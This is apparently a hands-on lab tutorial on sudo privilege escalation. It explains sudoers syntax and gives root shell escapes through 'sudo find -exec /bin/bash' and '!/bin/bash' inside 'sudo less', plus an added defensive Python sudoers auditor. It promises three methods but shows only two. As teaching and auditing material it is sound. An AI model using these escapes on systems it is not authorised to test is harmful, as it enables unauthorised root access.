Privilege Escalation via Sudo

Beginner

Introduction

In this lab, you will learn about the sudo configuration file syntax and practice three common methods to escalate privileges through sudo vulnerabilities or misconfigurations. The goal is to gain a better understanding of how to leverage sudo for privilege escalation during a penetration test.

Sudo Configuration File Syntax

In this step, you will learn about the syntax of the /etc/sudoers file, which is used to configure sudo privileges.

The /etc/sudoers file specifies which users or groups can run commands with elevated privileges. To save the lines of /etc/sudoers that mention root to a file, run the following command (the file is only readable by root, hence the sudo):

sudo cat /etc/sudoers | grep root > /home/labex/project/sudoers.txt

The output should look similar to the following:

## This file MUST be edited with the 'visudo' command as root.
## This preserves proxy settings from user environments of root
## While you shouldn't normally run git as root, you need to with etckeeper
## Per-user preferences; root won't have sensible values for them.
root    ALL=(ALL:ALL) ALL
## Members of the admin group may gain root privileges

The root    ALL=(ALL:ALL) ALL line specifies that the root user can run any command as any user or group on all hosts. The surrounding lines beginning with ## are comments that happen to contain the word root and were matched by grep.

The general syntax for a sudoers entry is:

user_or_group_name  host_list=(run_as_user:run_as_group)  command_list
  • user_or_group_name: The user or group to whom the rule applies.
  • host_list: The host(s) on which the rule applies. The value ALL means all hosts.
  • run_as_user: The user whose privileges are used to run the command. The value ALL means any user.
  • run_as_group: The group whose privileges are used to run the command. The value ALL means any group.
  • command_list: The command(s) that the user or group is allowed to run.

Sudo Enables Privilege Escalation Without Argument Restrictions

In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running any command with elevated privileges.

  1. First, open a terminal and navigate to the /home/labex/project directory.

    cd /home/labex/project

  2. Initialize the environment by running the following command:

    ./env_setup_1.sh

  3. You are now logged in as the user001 user. Use the sudo -l command to check your sudo privileges:

    sudo -l

    Expected output:

    (root) NOPASSWD:/usr/bin/find

    This means you can run the find command with root privileges without a password.

  4. To escalate privileges, run:

    sudo find /home -exec /bin/bash \;

    You should now have a root shell.

  5. Create a file named success_1.txt in the /root directory to verify that you have root privileges:

    echo "success_1" | sudo tee /root/success_1.txt

    Verify the file by running:

    cat /root/success_1.txt

    The output should be success_1.

Sudo Enables Privilege Escalation With Specific Command Arguments

In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running specific commands with elevated privileges.

After the previous step you are still logged in as the root user. Before continuing with this step, close the current terminal and open a new one.

  1. First, open a terminal and navigate to the /home/labex/project directory.

    cd /home/labex/project

  2. Initialize the environment by running the following command:

    ./env_setup_2.sh

  3. Check your sudo privileges with sudo -l:

    sudo -l

    Expected output:

    (root) NOPASSWD: /bin/less /var/log/messages

    This means you can run the command /bin/less /var/log/messages with root privileges without a password.

  4. To escalate privileges, run:

    sudo less /var/log/messages

    Once inside the less pager, run:

    !/bin/bash

    You should now have a root shell.

  5. Create a file named success_2.txt in the /root directory to verify that you have root privileges:

    echo "success_2" | sudo tee /root/success_2.txt

    Verify the file by running:

    cat /root/success_2.txt

    The output should be success_2.
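As an added example (not part of the lab), the following Python helper reads sudoers-style entries in the syntax from the first step and flags the two grant patterns exercised in the last two steps: running ALL as root, and running a binary as root that can spawn a shell (find via -exec, less via !command), whether or not NOPASSWD is set. The SAMPLE_SUDOERS text is constructed to mirror the entries the lab's env_setup scripts grant; SHELL_ESCAPE_BINARIES and SKIP_PREFIXES are the helper's own names.

```python
import re
# Added audit helper (not the lab's code): parses sudoers rules of the form shown in the
# lab and flags root grants on ALL or on binaries the lab shows can spawn a shell.
SHELL_ESCAPE_BINARIES = {"/usr/bin/find", "/bin/find", "/usr/bin/less", "/bin/less"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>\S+?)\s*=\s*"
                     r"(?:\((?P<runas_user>[^:)]*)(?::(?P<runas_group>[^)]*))?\))?\s*"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_rule(line):
    """Return a dict for one rule, or None for comments, blanks, Defaults and aliases."""
    line = line.split("#", 1)[0].strip()
    m = RULE_RE.match(line) if line and not line.startswith(SKIP_PREFIXES) else None
    if not m:
        return None
    return {
        "who": m.group("who"),
        "runas_user": m.group("runas_user") or "root",   # sudo's default run-as user
        "nopasswd": "NOPASSWD" in m.group("tags"),
        "commands": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
    }

def assess(rule):
    """Findings for one rule. The binary is checked even when its arguments are pinned,
    because /bin/less /var/log/messages still offers the !command escape."""
    if rule["who"] == "root" or rule["runas_user"] not in ("ALL", "root"):
        return []                        # stock root entry, or not run as root
    suffix = " without a password" if rule["nopasswd"] else ""
    findings = []
    for cmd in rule["commands"]:
        binary = cmd.split()[0]
        if cmd == "ALL":
            findings.append(f'{rule["who"]}: may run ANY command as root{suffix}')
        elif binary in SHELL_ESCAPE_BINARIES:
            findings.append(f'{rule["who"]}: {binary} can spawn a shell as root{suffix}')
    return findings

def audit(text):
    rules = filter(None, map(parse_rule, text.splitlines()))
    return [f for r in rules for f in assess(r)]

# Constructed sample modelled on the entries the lab's two env_setup scripts grant.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
user001 ALL=(root) NOPASSWD:/usr/bin/find
user002 ALL=(root) NOPASSWD: /bin/less /var/log/messages
backup  ALL=(root) /usr/bin/rsync
"""
```

audit(SAMPLE_SUDOERS) returns three findings: the %admin ALL grant and the find and less grants to user001 and user002, while the rsync entry for backup is not flagged. The check keys on the binary rather than its arguments, which is why the argument-pinned less entry from the last step is still reported.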

Summary

In this lab, you learned about the syntax of the /etc/sudoers file and how to configure sudo privileges. You also practiced three common methods to escalate privileges through sudo misconfigurations or vulnerabilities. By understanding how to leverage sudo for privilege escalation, you can better assess and mitigate potential security risks in Linux systems.
